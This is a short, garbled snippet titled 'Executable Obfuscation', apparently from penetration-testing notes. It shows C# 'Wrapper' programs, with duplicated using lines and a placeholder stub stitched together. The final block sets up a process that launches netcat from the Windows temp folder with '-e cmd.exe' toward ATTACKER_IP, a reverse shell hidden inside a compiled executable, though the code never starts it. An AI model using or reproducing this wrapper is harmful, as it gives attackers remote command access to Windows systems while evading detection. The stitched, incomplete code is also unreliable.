Executable Obfuscation
using System;
using System.Diagnostics;using System;
using System.Diagnostics;
namespace Wrapper{
class Program{
static void Main(){
//Insert rest of code here!
}
}
}using System;
using System.Diagnostics;
namespace Wrapper{
class Program{
static void Main(){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
}
}
}